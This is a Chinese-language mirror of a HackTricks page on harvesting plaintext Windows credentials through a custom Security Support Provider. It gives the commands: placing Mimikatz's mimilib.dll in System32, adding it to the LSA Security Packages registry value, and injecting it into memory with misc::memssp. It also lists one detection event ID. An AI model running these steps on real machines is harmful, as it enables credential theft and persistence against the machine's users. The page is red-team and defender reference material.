mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
3.4 KiB
3.4 KiB
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
其他支持HackTricks的方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
自定义SSP
了解什么是SSP(安全支持提供者)请点击这里。
您可以创建自己的SSP来捕获以明文形式访问计算机所使用的凭据。
Mimilib
您可以使用Mimikatz提供的mimilib.dll
二进制文件。这将在文件中记录所有明文凭据。
将dll放入C:\Windows\System32\
获取现有LSA安全包的列表:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
将mimilib.dll
添加到安全支持提供程序列表(安全包)中:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
在内存中
您还可以直接使用 Mimikatz 将其注入到内存中(请注意,这可能会有点不稳定/无法正常工作):
privilege::debug
misc::memssp
这种方法在重启后无法生存。
缓解
事件ID 4657 - 审计HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
的创建/更改
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中被广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 发现PEASS家族,我们的独家NFTs
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。